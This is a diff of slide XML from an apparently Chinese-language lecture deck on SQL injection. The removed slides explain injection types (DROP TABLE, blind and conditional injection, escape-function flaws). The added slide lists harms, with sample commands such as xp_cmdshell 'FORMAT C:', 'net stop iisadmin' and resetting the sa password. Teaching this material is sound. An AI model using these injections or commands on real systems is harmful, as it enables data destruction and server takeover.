-              <a:t>:= "SELECT * FROM data WHERE id = "  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>a_variable</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>   ";" </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>　　</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>从</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>这个语句可以看出，作者希望</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>a_variable</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>是一个与“</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>id”</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>字段有关的数字。不过，如果终端用户选择一个字符串，就绕过了对转义字符的需要。例如，将</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>a_variable</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>设置为</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>:1;DROP </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>TABLEusers</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>，它会将“</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>users”</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>表从数据库中删除，</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>语句变成：</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SELECT * FROM DATA WHERE id = 1;DROP TABLE users; </a:t>
+              <a:t>+XSS</a:t>
             </a:r>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
@@ -9334,7 +11627,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3815983041"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399338562"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -9363,7 +11656,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="5" name="标题 4"/>
+          <p:cNvPr id="2" name="标题 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -9373,163 +11666,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1012925" y="88135"/>
-            <a:ext cx="10364452" cy="1605094"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>注入 分类</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="10" name="文本占位符 9"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="half" idx="16"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1643064" y="2943355"/>
-            <a:ext cx="3777235" cy="2847845"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>有时，数据库服务器软件中也存在着</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>漏洞</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>如</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>MYSQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>服务器中</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>mysql_real_escape_string</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>() </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>函数</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>漏洞</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>。</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>这种</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>漏洞允许一个攻击者根据错误的统一字符编码执行一次成功的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注入式攻击。 </a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="文本占位符 7"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="quarter" idx="13"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1643063" y="2367093"/>
-            <a:ext cx="3578931" cy="576262"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>3.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>数据库服务器中的漏洞</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="文本占位符 10"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="half" idx="17"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6535531" y="2943354"/>
-            <a:ext cx="4109291" cy="2847845"/>
+            <a:off x="913775" y="263675"/>
+            <a:ext cx="10364451" cy="1596177"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -9538,125 +11676,187 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>当一个</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Web</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>应用程序易于遭受攻击而其结果对攻击者却不见时，就会发生所谓的盲目</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
               <a:t>SQL</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注入式攻击</a:t>
-            </a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
+              <a:t>注入 危害</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="内容占位符 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph sz="quarter" idx="13"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1009309" y="1665027"/>
+            <a:ext cx="10905186" cy="4713026"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
             <a:r>
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>。</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>有</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>漏洞的网页可能并不会显示数据，而是</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>根据注入</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>到合法语句中的逻辑语句的结果显示不同的内容</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>。</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>这种</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>攻击相当耗时，因为必须为每一个获得的字节而精心构造一个新的语句。但是一旦漏洞的位置和目标信息的位置被确立以后，一种称为</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Absinthe</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>的工具就可以使这种攻击自动化。</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="12" name="文本占位符 7"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="quarter" idx="13"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6838558" y="2334042"/>
-            <a:ext cx="3304928" cy="576262"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>4.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>盲目</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>注入式攻击</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
+              <a:t>数据表中的数据外泄，例如个人机密数据，账户数据，密码等。</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>数据结构被黑客探知，得以做进一步攻击（例如</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>SELECT * FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>sys.tables</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>）。</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>数据库服务器被攻击，系统管理员账户被窜改（例如</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>ALTER LOGIN </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>sa</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> WITH PASSWORD='</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>xxxxxx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>'</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>）。</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>获取系统较高权限后，有可能得以在网页加入恶意链接、恶意代码以及</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>XSS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>等。</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>经由数据库服务器提供的操作系统支持，让黑客得以修改或控制操作系统（例如</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>xp_cmdshell</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> "net stop </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>iisadmin</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>可停止服务器的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>IIS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>服务）。</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>破坏硬盘数据，瘫痪全系统（例如</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>xp_cmdshell</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t> "FORMAT C:"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>）。</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4128830523"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3014163891"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -9693,311 +11893,30 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注入 分类</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="文本占位符 3"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="half" idx="15"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="913774" y="2656916"/>
-            <a:ext cx="4352290" cy="3336259"/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="804593" y="2420021"/>
+            <a:ext cx="10364451" cy="1596177"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit lnSpcReduction="10000"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>有一种</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注入迫使数据库在一个普通的应用程序屏幕上计算一个逻辑语句的值： 　　</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>booktitle</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t> FROM booklist WHERE </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>bookId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t> = 'OOk14cd'AND 1=1 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>　　</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>这会</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>导致一个标准的面面，而语句 　　</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>booktitle</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t> FROM booklist WHERE </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>bookId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t> = 'OOk14cd'AND </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>1=2</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>在</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>页面易于受到</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注入式攻击时，它有可能给出一个不同的结果。如此这般的一次注入将会证明盲目的</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注入是可能的，它会使攻击者根据另外一个 表中的某字段内容设计可以评判真伪的语句。</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="文本占位符 4"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="quarter" idx="3"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1461055" y="1926563"/>
-            <a:ext cx="3291521" cy="576262"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>5.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>条件响应</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="文本占位符 5"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="half" idx="16"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6819442" y="2978257"/>
-            <a:ext cx="4232374" cy="2847845"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>如果</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>WHERE</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>语句为真，这种类型的盲目</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>注入会迫使数据库评判一个引起错误的语句，从而导致一个</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>SQL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>错误。例如： 　　</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>SELECT </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>1/0 FROM users WHERE username='Ralph'</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>。</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>显然</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>，如果用户</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Ralph</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>存在的话，被零除将导致错误。</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="文本占位符 6"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" sz="quarter" idx="13"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="7065551" y="1926563"/>
-            <a:ext cx="3304928" cy="576262"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>6.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
-              <a:t>条件性差错</a:t>
-            </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
